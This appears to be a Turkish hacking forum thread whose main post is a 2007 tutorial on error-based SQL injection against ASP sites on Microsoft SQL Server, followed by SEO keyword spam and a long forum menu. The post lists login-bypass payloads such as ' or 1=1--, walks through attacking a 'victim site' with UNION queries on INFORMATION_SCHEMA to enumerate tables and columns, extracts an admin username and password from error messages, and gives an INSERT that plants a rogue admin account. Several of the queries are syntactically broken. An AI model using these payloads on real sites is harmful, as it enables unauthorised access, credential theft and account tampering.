Ana Sayfa
Yardım
Üyeler
Giriş Yap
Kayıt
HoşGeldin Ziyretçi, Lütfen
Giriş Yap
ya da
Üye Ol
Ip Adresiniz: 38.107.179.240
Username:
1 Saat
1 Gün
1 Hafta
1 Ay
Her zaman
Password:
WwW.HacKbanK.Gen.TR
Webmaster, SMF, MSN, Bilgisayar, Donanım, Yazılım, Network, İnternet, GSM, Elektrik Elektronik
Web Tasarım
ASP SQL Injection
Sayfa: [
1
]
Aşağı git
« önceki
sonraki »
Gönderen
Konu: ASP SQL Injection (Okunma Sayısı 536 defa)
0 Üye ve 2 Ziyaretçi konuyu incelemekte.
MuratbanK'in HacKbanK Bilgileri
MuratbanK
MuratbanK
HacKbanKlının Profilini Goster
Ozel Mesaj Gonder
Son Mesajlarını Goster
Arkadas Listeme Ekle
кαяαηℓιктαкi göякєmℓi ιşιğιηιz
¼ ™ ѕιтє кυяυ©υѕυ © ¾
ωєвмαѕтєя üує
HacKbanK lıya Ozgu Mesajı
™ кαяαmuяαтвαηк © тєкєℓуєηιяαкı=нαуαт ρєєн
Cinsiyeti
Uye Numarası (ID)
1
HacKbanK a Kayıt Tarihi
Temmuz 13, 2007, 04:26:51 ÖS
Nerden
тєкєℓуєηιяαкıηıη σℓ∂υgυ нєянαηgι вιя çιℓιηgιя ѕσƒяαѕıη∂αη
HacKbanKlının Yası: 30
HacKbanK taki Mesaj Sayısı
22317
HacKbanK Rep Puanı
Rep Puanı: 19748
Deneyimleri
Aktiflik
Deneyim
Seviye
HıyarlıK
HacKbanK Tecrubeleri
Paylasım
Guc/Power
Ukalalık
Tehlike Duzeyi
Iletisim Bilgileri
Ruh Halim:
ASP SQL Injection
«
:
Temmuz 29, 2007, 01:38:06 ÖÖ »
ASP SQL Injection
ASP Sql Enjeksiyon a geçmeden önce bir kaç temel kavrama bakalim;
Database = Veritabani Nedir :
Veritabani verilerimizin düzenli olarak saklandigi dijital bir
ortamdir. Verilerimizi anlamli kilmak da bizim bilfimizi olusturur.
Veritabani Programlari:
Günümüzde, birçok firmanin ürettigi db programlari mevcuttur... Ama
bunlarin en bilinenleri ORACLE , SQL SERVER, MS ACCESS, FOX PRO'dur.
SQL Nedir :
Sql (Structured Query Language) bir veritabani dilidir.Uygulama
gelistiriciler, bir veritabanina yeni tablo veya veri eklerken,
silerken veya bir veriyi ararken bu dili kullanirlar.
Bu anlamda genis kabul görmüs bir standarttir. Örnegin MS ACCESS'te
bunu yapmanin baska yöntemleri de olsa, sonuçta Sql karsiligi her
zaman vardir. Örnek bir Sql ifadesi yazalim;
diyelim ki xchatx tablosundan Hack isimli dökümanin fiyatini bize
bulsun Sql da sorgulamalar SELECT ile yapilir Bu sorgu yazilisi ;
SELECT fiyat FROM xchatx WHERE dokuman ismi="hack"
SELECT deyiminden sonraki gelen ilk ifade, sorgunun sonundaki WHERE
kriterine göre tespit edilen kriterlerin hangi alanlarinin
görüntülenecegi bilgisidir. FROM deyiminden sonraki ifade,
sorgulkamanin hangi tablodan yapilacagini bildirir. WHERE deyimi
ise , sorgulamanin hangi kriter ya da kriterlere göre yapilacagini
belirtmemizi saglar.
Iste SQL ENJEKSIYON DA ILK BASTA SITENIN DB sindeki TABLO Ismini
bilmemiz gerekmez mi sizce yoksa SELECT WHERE Falan nasi kullanalim
o nedenle SqL a ilk basta hata verdirip Tablo ismini ögrenmeliyiz.
SQL Hata verdirtmek için sunlar yapilabilir:
Asp sql enjeksiyondan bahsedecegim
Asp sitemizin tabiki db si ve sql si olan search engine ya da
login barina :
'
Bunu yaziyoruz Egeeer :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'xchatx1' to a column of data type
int.
/index.asp, line 29
Burda illa da line 29 ve index.asp olmak zorunda degil tipa tip
aynisi olmayacak elbette sadece Sytntax error oracle falan çikmasi
lazim...
Baska türlü de sql a hata verdirebilirsiniz :
' or 1=1--
" or 1=1--
' or 'a'='a
or 1=1--
') or ('a'='a
" or "a"="a
Bunlari da aynene deneyin ...
simdi o hatayi aldik da ne oldu diyorsaniz orda TABLE ismini
ögrendik xchatx1 table namemimiz.
Simdi burdan diger tablolarinda ismini ögrenmemiz lazim...
SELECT* FROM xchatx1 WHERE dokumanID='' or 1=1--'
Burda yaptigimiz sey bize xchatx1 table inda dokumanIDsi bos olan
seyi getir ya da 1=1 degerine uyan tabloyu getir dedik burda feyk
attik SQL a yani.
Burdan diger table isimlerini de ögreniriz. Sonra istedigimiz seyi
SELECT WHERE deyimlerini kullanarak getiririz. Önümüze...
Simdi örnek bi saldiri yapalim ve yeni seyler ögrenelim biraz daha :
ilk önce kurban siteyi seçtik....
Baktik sql açigi da var ' bu isaret ile test ettik açik var yani.
UNION SELECT TOP 1
TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
UNION SQL a birden çok soru sormak için kullandik.
INFORMATION_SCHEMA.TABLES-- ise hiç table ismi bilmedigimiz için
yazdik
Top 1 table_name ise en üstteki tablo anlamina geliyor.
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'serles' to a column of data type int.
/index.asp, line 23
Hatamizi aldik
Top 1 table_name serles mis!!
Simdi isimize yarayacak tablelari ögrenelim mesela admin table
larini burda da LIKE deyimini kullanicaz içinde admin geçen
kelimeleri getir bize SQL!!! diyecez.
UNION SELECT TOP 1
TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%
25admin%25'--
Hatayi aliyoruz :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'admins' to a column of data type int.
/index.asp, line 3
Burda admin diye baslayan admins diye bir table var. Simdi bu admins
table inin column yani sutünlarini ögrenme zamani!
Kodu yaziyoruz :
UNION
SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME LIKE = 'admins'--
Burada da INFORMATION_SCHEMA.TABLES yerine
INFORMATION_SCHEMA.COLUMNS deyimini yazdik. Yani yine feyk attik
sql'e, o da bu feykimizi yedi:
Hatayi alalim :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'logonID' to a column of data type
int.
/index.asp, line 22
ilk kolum LogonID çikti
Simdi 2. sütünü istiyoruz :
UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='admins' WHERE COLUMN_NAME NOT IN ('logonID')--
Burda en tepede olan ama LogonID olmayani istedik ve hatayi görelim:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'logs' to a column of data type int.
Ögrendik adi logs.
Artik sifre neredeyse geliyor kucagimiza
Önce Password ve detaillarina bakicaz.
UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='admins' WHERE COLUMN_NAME NOT IN
('logonID','logs','password',details')--
Hata :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC sql Server Driver][sql Server]ORDER BY items must
appear in the select list if the statement contains a UNION
operator.
/index.asp, line 4
iki sütün var sansimiza güvenelim ilk logonu deneyelim :
UNION SELECT TOP 1 logon
FROM admins--
admins table indaki logon sütunundaki ilk ini seçiyoruz.
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'xrealcrack' to a column of data type
int.
/index.asp, line 7
ve admin nick geldi.
xrealcrack isimli kullanicinin sifresini ver bize SQL
UNION SELECT TOP 1 password
FROM admins where logon=' xrealcrack '--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'albert8387vsc' to a column of data
type int.
/index.asp, line 4
Sifremizi aldik albert8387vsc ok artik hackledik..
Kendimiz de kullanici yaratabiliriz admins table inda logon column
ünde
Kodu :
INSERT
INTO 'admins' ('logonID', 'logon', 'password', 'details') VALUES
(223,'SwmeRt','123456','NA')--
Kayıtlı
< -- Seo4SMF Social Bookmark -->
кαяαηℓιктαкi göякєmℓi ιşιğιηιz:
™ нттρ://ωωω.нα¢квαηк.gєη.тя ©
Robot Moderator
HacKer HacK HacKeD HacKing
hacker
Mesajlar: 33174
Re: ASP SQL Injection
Posted on:
Mayıs 25, 2012, 04:56:32 ÖÖ
Hos Geldin Ziyaretci Arkadas. Ben Robot Moderator. HacKbanK tan Tam Anlamıyla Faydalanmak Icin Uye Olman Gerekmektedir.
indir
ASP SQL Injection indir, ASP SQL Injection download, ASP SQL Injection izle, ASP SQL Injection bul, ASP SQL Injection hack ASP SQL Injection hacked ASP SQL Injection hacking ASP SQL Injection hacker ASP SQL Injection programı ASP SQL Injection indir, ASP SQL Injection download, ASP SQL Injection izle, ASP SQL Injection smf, ASP SQL Injection kurulumu, ASP SQL Injection bul
Logged
Google Words:
ASP SQL Injection indir, ASP SQL Injection download, ASP SQL Injection izle, ASP SQL Injection bul, ASP SQL Injection programı, ASP SQL Injection hack, ASP SQL Injection hacker, ASP SQL Injection hacked, ASP SQL Injection hacking, ASP SQL Injection resimleri, ASP SQL Injection videosu, ASP SQL Injection smf, ASP SQL Injection peeh,
Sayfa: [
1
]
Yukarı git
Otomatik Tag
ASP SQL Injection, indir , download , izle , bul , ASP SQL Injection, programı , resimleri , smf , ASP SQL Injection, hack , hacker , hacked , hacker , security , support , ASP SQL Injection
« önceki
sonraki »
Gitmek istediğiniz yer:
Gitmek istediğiniz yer:
-----------------------------
Sinema, Türkçe Dublaj ve Altyazılı Yerli ve Yabancı Film
-----------------------------
=>
Sinema ve Sinema Hakkında Bilgiler
=>
Yerli Filmler
===>
Kota Dostu Yerli Filmler
===>
VCD / DVD Yerli Filmler
===>
Yüksek Kaliteli Yerli Filmler
===>
Torrent Yerli Filmler
=>
Yabancı Filmler
===>
Kota Dostu Yabancı Filmler
===>
VCD / DVD Yabancı Filmler
===>
Yüksek Kaliteli Yabancı Filmler
===>
Torrent Yabancı Filmler
=>
Animasyon ve Çizgi Filmler
=>
Belgeseller
=>
Online; Yerli ve Yabancı Sinema, Anime, Çizgi ve Belgesel Filmler
-----------------------------
Kanal Kanal Yerli Diziler
-----------------------------
=>
KANAL D Dizileri
===>
Fatmagül'ün Suçu Ne
===>
Öyle Bir Geçer Zaman Ki
===>
Arka Sokaklar
===>
Kanıt
===>
Umutsuz Ev Kadınları
===>
Kuzey Güney
===>
Yalan Dünya
===>
Keşanlı Ali Destanı
=>
SHOW TV Dizileri
===>
Pis 7'li
===>
Türk'ün Uzayla İmtihanı
===>
M.U.C.K
===>
Adını Feriha Koydum
===>
Eve Düşen Yıldırım
===>
Suskunlar
===>
Yetenek Sizsiniz Türkiye
===>
Survivor Ünlüler - Gönüllüler
=>
FOX TV Dizileri
===>
Yer Gök Aşk
===>
Lale Devri
===>
Unutma Beni
===>
Araf Zamanı
===>
Babam İçin
=>
STAR TV Dizileri
===>
Muhteşem Yüzyıl
===>
Beni Affet
===>
Behzat Ç.
===>
Koyu Kırmızı
===>
İffet
===>
Firar
===>
1 Erkek 1 Kadın
=>
ATV Dizileri
===>
Çocuklar Duymasın
===>
Yahşi Cazibe
===>
Hayat Devam Ediyor
===>
Son
===>
Al Yazmalım
===>
Alemin Kralı
===>
Uçurum
=>
TRT Dizileri
===>
Bir Zamanlar Osmanlı Kıyam
===>
Sakarya Fırat
===>
Elde Var Hayat
===>
Leyla İle Mecnun
===>
Seksenler
===>
Kurt Kanunu
=>
Kurtlar Vadisi
=>
Diğer Yerli Diziler
-----------------------------
Yabancı Diziler
-----------------------------
=>
Dragon Ball
=>
The Sarah Connor Chronicles
=>
Yabancı Diziler
-----------------------------
Hack, Hacker, Hacked, Hacking, Güvenlik, Güvenlik Açıkları, Programlar
-----------------------------
=>
HacK, Hacker ve Güvenlik Açıkları
===>
Güncel ve Kişiye Özel Premium Şifre Paylaşım Alanı
=>
Güvenlik / Security
===>
Şifreleme Araçları ve Programları
===>
Antivirüsler
=> Program Deposu
===> Resimli Prgram Anlatımı
=>
HacK TeaM
=>
YARDIMLAŞMA
=>
BanneD
-----------------------------
Forum Kullanımı, Tanışma, Anketler, Eleştiriler, İstekler, Öneriler, Duyurular
-----------------------------
=>
HACKBANK FORUM KULLANIMI
===>
Forum Kuralları
===>
NicKiniz@HacKbanK.Gen.TR MSN Adres İstekleriniz ve Üye İsim Değişikliği Başvurusu Alanı
===>
YÖNETİM EKİBİ
===>
Haftanın ve Ayın: Üyeleri ve Konuları
=>
HEY BEN DE BURDAYIM DİYENLER
=>
ANKETLER
=>
Eleştirileriniz & Önerileriniz & İstekleriniz & Duyurular
===>
Özel Günler
===>
Kırmızı Koltuk
=> KONU DIŞI
=> ARŞİV
-----------------------------
Webmaster, SMF, MSN, Bilgisayar, Donanım, Yazılım, Network, İnternet, GSM, Elektrik Elektronik
-----------------------------
=> WebMaster
===> WebMaster Makaleler
=> Web Tasarım
===> Grafik Tasarım
===> Site Tanıtım
=> Simple Machines Forum SMF
=> PC / Bilgisayar
===> Donanım
===> Yazılım (HTML, PHP, ASP, C# vs)
===> PC Haberleri
===> Wallpaper
=> İşletim Sistemleri
===> Windows
===> Linux
===> Macintosh
===> Pardus
=> Network / İnternet
===> MSN
=> Elektronik Programlar ve Şemalar, Oto Elektrik Dersleri
=> Cep Telefonu Ve GSM Dünyası
-----------------------------
Haberler, Müzik, MP3, Şiir, Kitap, Aşk-Sevgi, Resim Galerisi; 18+ İçerikler ve Korku
-----------------------------
=> Türkiye'den ve Dünya'dan Haberler
=> Müzik, Klipler, Enstrümentaller, Türküler, Hikayeler, MP3
===> TürKçe MP3 İndir / DownloaD
===> Yabancı MP3 İndir / DownloaD
=> Şiirler / Sözler
=> Kitaplar / Dergiler
=> Aşka ve Sevgiye Dair Yazılar, Hikayeler ve Resimler
=> Resim ve Video Galerisi
===> İlginç Resimler
===> Komik Resimler ve Videolar
===> Karikatürler
=> 18+ İçerikler
===> 18+ Fıkralar
===> 18+ Hikaye ve Yazılar
===> 18+ Resimler ve Videolar
===> Korku Tüneli
-----------------------------
Geyik Muhabbetleri, Komik ve Matrak Yazılar, Oyun Tanıtım ve İndirme Alanı, Satranç Evreni, Hayvanlar Alemi, Bitki Dünyası, Uzay
-----------------------------
=> Güldüren Fıkralar
=> Komik, Matrak ve Geyik Yazılar
=> Şen Şakrak Hikayeler
=> Sohbet ve Muhabbet
=> Bilgisayar Oyunları, Tam Çözümleri, Oyun Hileleri, Oyun İndirme Merkezi
===> Oyun Hileleri
===> Oyun Deposu İndirme Merkezi
=> Flash Oyunlar, Bilmece Bulmaca ve Forum Oyunları
===> Bilmeceler ve Bulmacalar
===> Forum Oyunları
=> Satranç Evreni
=> Hayvanlar Alemi
=> Bitki Dünyası
=> Uzay / Feza / Evren
-----------------------------
Genel Kültür ve Genel Yetenek, Türkiye ve Dünya, Dinler
-----------------------------
=> Mustafa Kemal ATATÜRK
=> Bilim ve Teknik
=> Türk Dili ve Edebiyatı, Dünya Edebiyatı
=> Tarih
===> Anlı Şanlı Osmanlı Tarihi
=> Coğrafya ve Turizm
=> Hukuk
=> Ülkemiz: Türkiye
===> Bölgelerimiz
===> Şehirlerimiz
===> Üniversitelerimiz
===> Meslekler Rehberi
=> Dünya Ülkeleri
=>
Dinimiz: İslamiyet
=> Diğer Dinler
-----------------------------
Hayata Dair (Sağlıktan Tariflere, İlişkilerden Yaşam Hikayelerine) Ne Var Ne Yoksa
-----------------------------
=> Yaşamdan Kesitler, Alıntılar, Hikayeler, Testler ve Yazılar
===> Psikoloji / Psikiyatri
===> Onkoloji / Kanser
===> Diabet / Şeker Hastalığı
===> Çocuk Hastalıkları
===> Alternatif Tıp
=> Mutfaktayız (Yiyecek ve İçecek Tarifleri) ve Diyetler
===> Diyetler
=> Rüya Tabirleri
=> Biyografiler
===> Yerli Biyografiler
===> Yabancı Biyografiler
===> Hayali ve Süper Kahraman Biyografileri
=> İkili İlişkiler
=> HacKbanK Özel Paylaşım Alanı
===> Günün Sözü Panosu
===> Dert Ortağım Köşesi
===> İtiraflar
===> Günlük (Seyir Defteri)
-----------------------------
Kadınlar Kulübü ve Burçlar
-----------------------------
=> Anneler ve Çocukları
=> Kadınca
===> Saç ve Makyaj ve Cilt Bakımı
===> Moda
===> Pratik Bilgiler
===> Kadın Hastalıkları
=> Astroloji ve Burçlar
===> Koç
===> Boğa
===> İkizler
===> Yengeç
===> Aslan
===> Başak
===> Terazi
===> Akrep
===> Yay
===> Oğlak
===> Kova
===> Balık
-----------------------------
Erkekler Kulübü ve Spor Bölümü
-----------------------------
=> Babalar ve Çocukları
=> Motorlu Taşıtlar
===> Modifikasyon Araçlar
=> Futbol Meydanı
===> Beşiktaş/BJK
===> FenerBahçe
===> GalataSaray
===> TrabzonSpor
===> Diğer Klüpler
=> Diğer Spor Dalları
=> Erkekçe
-----------------------------
Formula 1
-----------------------------
=> Formula 1; Genel Bilgiler, Sıralama ve Yarış Verileri
=> Formula 1 Haberler
=> Formula 1 Tüm Sezonlar İndir ve İzle Padoğu
-----------------------------
ÇÖP VARİLİ
-----------------------------
=> ÇÖP BİDONU
-----------------------------
YÖNETİM MERKEZİ
-----------------------------
=> Yönetim Merkezi
Yükleniyor...